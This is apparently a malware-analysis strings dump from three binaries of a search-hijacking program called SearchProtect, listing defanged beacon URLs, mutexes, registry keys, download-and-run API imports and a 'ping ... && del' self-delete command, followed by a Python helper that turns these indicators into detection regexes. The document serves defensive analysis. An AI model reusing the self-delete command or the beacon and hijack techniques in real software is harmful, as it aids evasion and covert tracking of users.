Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation
ProtectWindowsManager.exe_3736:
.text
`.rdata
@.data
.rsrc
@.reloc
?456789:;
!"#$%&'()* ,-./0123
SHELL32.dll
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GetProcessWindowStation
operator
SHLWAPI.dll
%dYeArdMoNthdDaY
URLDownloadToFileA
file_url
ShellExecuteExW
SHDeleteKeyW
GetWindowsDirectoryA
GetProcessHeap
GetSystemWindowsDirectoryW
KERNEL32.dll
USER32.dll
RegCreateKeyExW
RegCloseKey
RegOpenKeyExW
RegCreateKeyW
ReportEventW
ADVAPI32.dll
PSAPI.DLL
USERENV.dll
VERSION.dll
GetCPInfo
%s_%s
\\.\Phys
..\Src\json\src\json_value.cpp
..\Src\json\src\json_reader.cpp
xxxx
..\Src\json\src\json_writer.cpp
kernel32.dll
mscoree.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
USER32.DLL
portuguese-brazilian
WindowsMangerProtect
SOFTWARE\supWindowsMangerProtect
xa.geoip
visit.heartbeat
ProtectWindowsManager.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
TypesSupported
%s is already installed
%s installed
%s failed to install. Error %d
%s is not installed
Could not remove %s. Error %d
WindowsProtectManger
Advapi32.dll
/c ping 127.0.0.1 -n 2 > nul && del
"%s" %s
psapi.dll
Explorer.exe
urlmon.dll
update.exe
Assertion failed: %s, file %s, line %d
WindowsMangerProtect Service
C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe
WindowsMangerProtect service
SysTool PasSame LIMITED
Windows SysTool Svr
20.0.0.2227
Windows SysTool.exe
HPNotify.exe_3640:
.text
`.rdata
@.data
.rsrc
@.reloc
wszUrl
strUrlTemp
hKEY
strSelUrl
strUrl
strConfUrlTemp
strDsUrl
strHpUrl
strCmdLine
e_GetBrowserCurrentHpUrl
e_GetBrowserCurrentDsUrl
URLDownloadToFileW
URLDownloadToFileW ret:0XX
Error : %d
inflate 1.1.3 Copyright 1995-1998 Mark Adler
1.1.3
monochrome
unsupported bit depth
Run-Time Check Failure #%d - %s
%s%s%p%s%ld%s%d%s
%s%s%s%s
RegOpenKeyExW
RegCloseKey
del /s/q %1\*.*
%suninstall.bat
E:\supsoft\SupSearchProtectV4\SearchProtect\bin\Release\HPNotify.pdb
KERNEL32.dll
GetKeyState
USER32.dll
GDI32.dll
ADVAPI32.dll
ShellExecuteW
ShellExecuteA
ShellExecuteExW
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHDeleteKeyW
SHLWAPI.dll
MSVCP110.dll
MSVCR110.dll
_calloc_crt
_CRT_RTC_INITW
__crtGetShowWindowMode
_amsg_exit
_wcmdln
_crt_debugger_hook
__crtUnhandledException
__crtTerminateProcess
__crtSetUnhandledExceptionFilter
GdiplusShutdown
gdiplus.dll
IMM32.dll
DeleteUrlCacheEntryW
WININET.dll
COMCTL32.dll
GetProcessHeap
.?AVCActiveXEnum@DuiLib@@
.?AVCWebBrowserUI@DuiLib@@
hXXp://VVV.bing.com/
hXXp://VVV.yahoo.com/
hXXp://VVV.google.com/
%sconf
web/?type=dspp&
web/?type=dspp
hXXp://VVV.v9.com/
Itemd
BrowserAction.dll
%u_%u
%s_%s
%s_X
\\.\PhysicalDrive%d
\\.\Scsi%d:
UrlEdit
conf.xml
hXXp://v9.com/license_agreement.html
hXXp://v9.com/privacy_policy.html
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=set.show.%s
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=set.other.%s
%stmp%d.tmp
urlmon.dll
main.xml
explorer.exe
Global\{5F26509F-29FE-4598-8800-FA22CE9CC17F}__Mutex
IeWatchDog.dll
BrowerWatchFF.dll
BrowerWatchCH.dll
Global\GUID(6D05BFEC-4307-4649-8963-962A24345DF4)
msimg32.dll
User32.dll
WM_KEYDOWN
WM_KEYUP
WM_SYSKEYDOWN
WM_SYSKEYUP
0xX
keyboard
msftedit.dll
password
%s%s%s
Correct password required
%s\%s
WebBrowser
transshadow
transshadow1
dest='%d,%d,%d,%d'
dest='%d,%d,%d,%d' source='%d,%d,%d,%d'
source='%d,%d,%d,%d' dest='%d,%d,%d,%d'
M-d-d
WebBrowserUI
errorUrl
{D27CDB6E-AE6D-11CF-96B8-444553540000}
user32.dll
MSPDB110.DLL
ADVAPI32.DLL
/c ping 127.0.0.1 -n 2 > nul && del /s/q
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
%Program Files% (x86)\XTab\skin\
SupHPNot.exe
4,0,1,2253
SupHPNty.exe
ProtectService.exe_3668:
.text
`.rdata
@.data
.rsrc
@.reloc
GET %s%s%s HTTP/1.1
Host: %s
%sUser-Agent: Mozilla/4.0
POST %s HTTP/1.1
%sContent-Type: %s
User-Agent: Mozilla/4.0
Content-Length: %u
%*s %d %*s
%*[ ]%[^
?456789:;
!"#$%&'()* ,-./0123
file_url
E:\supsoft\SupSearchProtectV4\SearchProtect\Bin\Release\ProtectService.pdb
GetProcessHeap
GetSystemWindowsDirectoryW
KERNEL32.dll
USER32.dll
RegOpenKeyW
RegCloseKey
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
SHELL32.dll
MSVCP110.dll
InternetCrackUrlW
WININET.dll
WS2_32.dll
SHLWAPI.dll
MSVCR110.dll
_crt_debugger_hook
__crtUnhandledException
__crtTerminateProcess
_calloc_crt
__crtGetShowWindowMode
_amsg_exit
_wcmdln
__crtSetUnhandledExceptionFilter
WinHttpCloseHandle
WinHttpOpen
WinHttpSetTimeouts
WinHttpCrackUrl
WinHttpConnect
WinHttpOpenRequest
WinHttpSetOption
WinHttpAddRequestHeaders
WinHttpSendRequest
WinHttpGetIEProxyConfigForCurrentUser
WinHttpGetProxyForUrl
WinHttpWriteData
WinHttpReceiveResponse
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpReadData
WINHTTP.dll
SensApi.dll
VERSION.dll
PSAPI.DLL
USERENV.dll
.?AVCHttpClient@@
.?AVCTcpipSocket@@
hXXp://
Software\Microsoft\Windows\CurrentVersion\Internet Settings
http=
WinHttpClient
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
hXXp://xa.xingcloud.com
xxxx
%u_%u
%s_%s
%s_X
\\.\PhysicalDrive%d
UpDateProcess.exe
hXXp://VVV.theviilage.com/searchprotect/up?ptid=%s&sid=%s&ln=%s_%s&ver=%s&uid=%s&dp=%s
g{2EFFE99D-743D-44D0-BBF2-F9DDDEA2F92D}
Global\{5F26509F-29FE-4598-8800-FA22CE9CC17F}__Mutex
Report HeartBeat
cmdshell.exe
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=visit.heartbeat.%s&update0=ref,%s&update1=nation,%s&update2=language,%s&update3=version,%s
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action0=xa.geoip&action1=visit&action2=install
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=uninstall
explorer.exe
Advapi32.dll
"%s" %s
psapi.dll
Explorer.exe
json_value.cpp
ljson_reader.cpp
ProtectSvc.exe
4.0.1.2253
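Added example, not part of the Lavasoft report and not the sample's own code: a Python triage helper that turns the strings dumped from ProtectWindowsManager.exe, HPNotify.exe and ProtectService.exe above into checks an analyst can run. The beacon URL format strings from the dumps are compiled into regexes (each %s/%u/%d becomes a capture group) so proxy-log URLs can be matched and their telemetry fields extracted, and the host artifacts (the two mutex names, the SOFTWARE\supWindowsMangerProtect key, the service binary path, the PDB paths and the "ping 127.0.0.1 ... && del" self-delete command) are searched for in a strings dump or command-line log. The report defangs URLs as hXXp:// and VVV., so the helper refangs both templates and input before matching. The sample dump lines and URLs at the bottom are constructed; the field values in them (abc123, p1, s9, ...) are placeholders, not observed data.

```python
import re
from typing import Dict, List, Optional, Tuple

# URL format strings copied from the ProtectService.exe / HPNotify.exe dumps, kept defanged
# exactly as the report prints them (hXXp://, VVV.).
BEACON_TEMPLATES = {
    "heartbeat": "hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=visit.heartbeat.%s&update0=ref,%s&update1=nation,%s&update2=language,%s&update3=version,%s",
    "install": "hXXp://xa.xingcloud.com/v4/searchprotect/%s?action0=xa.geoip&action1=visit&action2=install",
    "uninstall": "hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=uninstall",
    "set_show": "hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=set.show.%s",
    "set_other": "hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=set.other.%s",
    "update": "hXXp://VVV.theviilage.com/searchprotect/up?ptid=%s&sid=%s&ln=%s_%s&ver=%s&uid=%s&dp=%s",
}

# Host-side artifacts taken verbatim from the dumps; matched as case-insensitive substrings.
HOST_IOCS = {
    "mutex": [r"Global\{5F26509F-29FE-4598-8800-FA22CE9CC17F}__Mutex",
              r"Global\GUID(6D05BFEC-4307-4649-8963-962A24345DF4)"],
    "registry": [r"SOFTWARE\supWindowsMangerProtect"],
    "service_binary": [r"C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe"],
    "pdb_path": [r"E:\supsoft\SupSearchProtectV4\SearchProtect\Bin\Release\ProtectService.pdb",
                 r"E:\supsoft\SupSearchProtectV4\SearchProtect\bin\Release\HPNotify.pdb"],
    # Both binaries carry this cmd.exe argument; the HPNotify variant appends "/s/q".
    "self_delete": ["/c ping 127.0.0.1 -n 2 > nul && del"],
}


def refang(s: str) -> str:
    """Undo the report's defanging so the templates match real traffic (hXXp -> http, VVV. -> www.)."""
    return s.replace("hXXps://", "https://").replace("hXXp://", "http://").replace("://VVV.", "://www.")


def template_to_regex(template: str) -> "re.Pattern[str]":
    """Compile a printf-style URL template into an anchored regex with one group per conversion.
    Literal text is escaped; a %s field may not span a query delimiter (&, ?, =, comma, slash),
    which is what keeps "ln=%s_%s" splitting into two groups instead of one."""
    out = []
    for part in re.split(r"(%[sud])", refang(template)):
        if part == "%s":
            out.append(r"([^&?=,/]+)")
        elif part in ("%u", "%d"):
            out.append(r"(\d+)")
        else:
            out.append(re.escape(part))
    return re.compile("^" + "".join(out) + "$")


_COMPILED = {name: template_to_regex(t) for name, t in BEACON_TEMPLATES.items()}


def match_beacon(url: str) -> Optional[Tuple[str, List[str]]]:
    """Return (template name, captured fields) when a URL matches one of the dumped beacons."""
    url = refang(url.strip())
    for name, rx in _COMPILED.items():
        m = rx.match(url)
        if m:
            return name, list(m.groups())
    return None


def scan_strings(lines: List[str]) -> Dict[str, List[str]]:
    """Group lines from a strings dump or command-line log by the host IOC category they hit."""
    hits: Dict[str, List[str]] = {}
    for line in lines:
        low = line.lower()
        for category, needles in HOST_IOCS.items():
            if any(n.lower() in low for n in needles):
                hits.setdefault(category, []).append(line)
    return hits


# Constructed sample input (assumed, not taken from the report): lines as they might appear in
# a strings dump of a suspect process, plus proxy-log URLs with placeholder field values.
SAMPLE_DUMP = [
    r"Global\{5F26509F-29FE-4598-8800-FA22CE9CC17F}__Mutex",
    r"SOFTWARE\supWindowsMangerProtect",
    r"cmd.exe /c ping 127.0.0.1 -n 2 > nul && del /s/q C:\Users\victim\AppData\Local\Temp\dropper.exe",
    "GetProcessHeap",
]
SAMPLE_URLS = [
    "http://xa.xingcloud.com/v4/searchprotect/abc123?action=visit.heartbeat.xyz&update0=ref,bing&update1=nation,BR&update2=language,pt_BR&update3=version,4.0.1.2253",
    "http://www.theviilage.com/searchprotect/up?ptid=p1&sid=s9&ln=pt_BR&ver=4.0.1.2253&uid=0123&dp=none",
    "http://www.bing.com/",
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(url, "->", match_beacon(url))
    for category, lines in scan_strings(SAMPLE_DUMP).items():
        print(category, "->", lines)
```

The query-delimiter restriction on %s is what makes the templates usable as detections: without it the first field of the heartbeat URL would swallow the whole query string, and the "ln=%s_%s" field of the update URL could not be split into language and region.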